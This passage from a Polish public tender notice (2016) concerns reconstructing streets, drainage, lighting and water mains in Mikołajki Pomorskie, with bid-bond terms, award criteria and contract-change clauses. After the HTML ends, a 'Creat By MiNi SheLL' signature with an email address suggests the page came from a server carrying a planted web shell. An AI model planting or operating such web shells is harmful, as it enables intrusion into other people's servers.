              </b><br /><div style="padding-left: 20px">Oświadczenie ( zgodnie ze wzorem stanowiącym złącznik nr 3 o SI) o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust1 pkt 23 ustawy. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić  dowody, że powiązania z innym Wykonawcą nie prowadzi do zakłócenia konkurencji  w postępowaniu o udzielenie  zamówienia. Dokument ( np. zobowiązanie) innych podmiotów do oddania Wykonawcy do dyspozycji  niezbędnych zasobów na potrzeby realizacji, o ile Wykonawca korzysta ze zdolności innych podmiotów na zasadach  określonych w art.22a ustawy.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />

1.	Oferta musi być zabezpieczona wadium  w wysokości  20 000 złotych \ słownie dwadzieścia tysięcy złotych 00/100.
2.	 wadium może być wniesione w następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa  w art. 6b ust.5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz,.U. Nr 42 z 2007 r. poz. 275 z późn. Zm).
  Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek bankowy BS w Sztumie  
  nr  32  8309 0000 0000 0130 2000 0050  z podaniem tytułu wadium 
Przebudowa  ulicy Kościelnej, Piaskowej i Akacjowej, budowa zjazdów, odwodnienia, oświetlenia ulicznego ulicy Akacjowej  oraz przebudowę sieci wodociągowej ulicy Kościelnej, Dzierzgońskiej, Akacjowej i Słonecznej na działkach nr 119, 129/3, 130/17, 228, 231, 233, 237/2, 244/1, 244/2, 427 obręb  ewid. Mikołajki Pomorskie poza pasem drogi wojewódzkiej ( dz. nr 339/1).

Przed upływem terminu składania ofert-przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na koncie Zamawiającego.
3. Wadium wnoszone w postaci niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić dokument wadialny w taki sposób, aby jego zwrot przez Zamawiającego nie naruszył integralności oferty wraz z załącznikami( np. i umieszczony w koszulce, co pozwoli swobodne oddzielenie wadium od reszty dokumentów).
4.Wykonawca, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucony z postępowania.
5.Zwrot  lub zatrzymanie wadium przetargowego nastąpi na zasadach określonych w art.46 ustawy Pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena ryczałtowa</td><td>90</td></tr><tr><td>gwarancja</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />2.	Zamawiający przewiduje możliwość zmian postanowień  zawartej umowy, tj,
a)	zmiany przedstawicieli stron biorących udział w zamówieniu w przypadku niemożności pełnienia przez nich  powierzonych  funkcji  realizacji zamówienia ( np. zdarzenia losowe, zmiana pracy, rezygnacja itp._,
b)	z powodu działania siły wyższej (  odnotowanej w dzienniku budowy) niezależnej uniemożliwiającej wykonanie robót w określonym pierwotnie terminie o czas działania siły wyższej i potrzebny do usunięcia  skutków tego działania oraz wystąpienia okoliczności niezależnych od Wykonawcy i Zamawiającego takich jak np. długotrwałe intensywne opady deszczu, temperatura powietrza  przy której niedopuszczalne jest prowadzenie robót budowlanych, powodzie, itp.),
c)	nadzwyczajnych zdarzeń  gospodarczych niezależnych od Zamawiającego i Wykonawcy, których nie można było przewidzieć w chwili zawarcia umowy i wynikającej z tego zmiany terminu wykonania robót,
d)	zmiany zakresu rzeczowego w przypadku, gdy dla prawidłowej realizacji  przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy technicznej i obowiązującymi przepisami  niezbędne jest użycie rozwiązań zamiennych, innych materiałów, parametrów, innego rodzaju robót niż te wskazane w ofercie wykonawcy lub SIWZ nie powodujących wzrostu wynagrodzenia Wykonawcy.
e)	Zmiany wynagrodzenia Wykonawcy w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT),
f)	Zmiany wynikającej z konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem umowy i nieprzewidywalnych, których brak wykonania uniemożliwia  lub utrudnia prawidłowe wykonanie przedmiotu  umowy i wynikającej z tego zmiany terminu wykonania robót,
g)	odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie nie zinwentaryzowanej sieci lub instalacji i wynikającej z tego zmiany terminu wykonania robót,
h)	zmiany terminy wykonania umowy  ze względu na wydłużenie procedury przetargowej,
i)	nieterminowego  przekazania placu budowy,
j)	na wniosek Wykonawcy za zgodą Zamawiającego, w trakcie prowadzenia robót, mogą być dokonywane zmiany technologii wykonania elementów robót. Dopuszcza się je tylko w przypadku, gdy proponowane  przez Wykonawcę rozwiązanie jest  równorzędne lub lepsze od tego, jakie przewiduje dokumentacja projektowo-wykonawcza. W tym przypadku Wykonawca  przedstawia  projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami. Projekt taki wymaga akceptacji inspektora nadzoru oraz zgody autora projektu i zatwierdzenia do realizacji przez Zamawiającego. Koszty związane z uzyskaniem akceptacji ponosi Wykonawca,
k)	w przypadku ,gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań technicznych wynikających z umowy Zamawiający sporządza protokół konieczności, a następnie dostarcza dokumentację projektowo-wykonawczą na te roboty wraz ze zleceniem ich wykonania.
3.	Zmiana umowy może nastąpić w przypadkach, o których mowa w art.144 ust.1 pkt 2-6 ustawy.
4.	Wszelkie zmiany umowy wymagają  pisemnego aneksu pod rygorem nieważności takiej zmiany.


<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 26/10/2016, godzina: ,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com